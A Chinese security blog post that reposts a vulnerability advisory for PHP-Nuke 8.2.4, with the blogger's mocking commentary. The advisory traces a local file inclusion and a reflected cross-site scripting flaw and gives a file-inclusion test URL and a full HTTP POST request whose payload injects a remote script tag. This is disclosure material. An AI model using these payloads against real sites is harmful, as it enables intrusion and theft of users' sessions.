注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

K8拉登哥哥's Blog

K8搞基大队[K8team] 信息安全 网络安全 0day漏洞 渗透测试 黑客

 
 
 

日志

 
 

PHP-Nuke 8.2.4 文件包含漏洞 真扯淡 包含PHP  

2013-11-28 17:18:26|  分类: Web_0day |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

PHP能路径截断的版本 好像是4.X-5.0 之前吧记得不太清楚了 反正我已经很久没碰到能截成功的了
之前国内 有人发ecshop2.7.3 修复本地包含漏洞之后的 所谓包含0day  都一个鸟样包含php 我只想说哈哈
你妹的,这不是扯淡吗,不能截断那不是只得必须传PHP脚本,假如能传PHP脚本你就能直接解析了
还本地包含你妹啊,SB真是多? 什么 有人说可以这样留后门,SB你还如留个图片 或   另外那个啥函数更隐蔽。

PHP-Nuke 8.2.4 文件包含漏洞 真扯淡 包含PHP - K8拉登哥哥 - K8拉登哥哥s Blog

[SOJOBO-ADV-13-04] - PHP-Nuke 8.2.4 multiple vulnerabilities


I. * Information *
==================
Name : PHP-Nuke 8.2.4 multiple vulnerabilities
Software : PHP-Nuke 8.2.4 and possibly below.
Vendor Homepage : http://www.phpnuke.org/
Vulnerability Type : File Inclusion and Reflected Cross-Site Scripting
Severity : High (4/5)
Advisory Reference : SOJOBO-ADV-13-04 (http://www.enkomio.com/Advisories)
Credits: Sojobo dev team
Description: A File Inclusion and Reflected Cross Site Scripting vulnerability was discovered during the testing of Sojobo, Static Analysis Tool.


II. * Details *
===============
A) File Inclusion in mainfile.php [Impact: 4/5]


Follow a trace to reach the vulnerable code.


File: /html/index.php
15: require_once("mainfile.php");


File: /html/mainfile.php
90: if (!ini_get('register_globals')) {
91:  @import_request_variables("GPC", "");
...
274: if ((isset($newlang)) AND (stristr($newlang,"."))) {
275:  if (file_exists("language/lang-".$newlang.".php")) {
...
277:   include_once("language/lang-".$newlang.".php");  你妹不是扯淡吗 包含PHP


due to a call to the function 'import_request_variables' it is possible to create the variable $newlang with an arbitrary value and to allow the inclusion of an arbitrary local file.


A test request is: /index.php?newlang=/../../index


B) Reflected Cross Site Scripting in index.php (of module Your_Account) [Impact: 3/5]


Follow a trace to reach the vulnerable code.


File: /html/mainfile.php
90: if (!ini_get('register_globals')) {
91:  @import_request_variables("GPC", "");


File: /html/modules/Your_Account/index.php
758: function logout() {
769: if (!empty($redirect)) {
770: echo "<META HTTP-EQUIV=\"refresh\" content=\"3;URL=modules.php?name=$redirect\">";


due to a call to the function 'import_request_variables' it is possible to create the variable $redirect with an arbitrary value and to inject arbitrary HTML code. Due to
XSS filtering the request must be done via POST with the injection data sent as payload.


A HTTP POST test request is:


POST /html/modules.php?name=Your_Account&op=logout HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/25.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.example.com/html/index.php
Cookie: lang=english;
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 59


redirect="><script src="http://www.example.com/xss.html" />


III. * Report Timeline *
========================


18 November 2013 - Advisory released, unable to contact the vendor.


IV. * About Sojobo *
====================
Sojobo allows you to find security vulnerabilities in your PHP web application source code before others do.
By using the state of the art techniques Sojobo is able to identify the most critical vulnerabilities in your code
and limit the number of false positives.
  评论这张
 
阅读(1398)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2016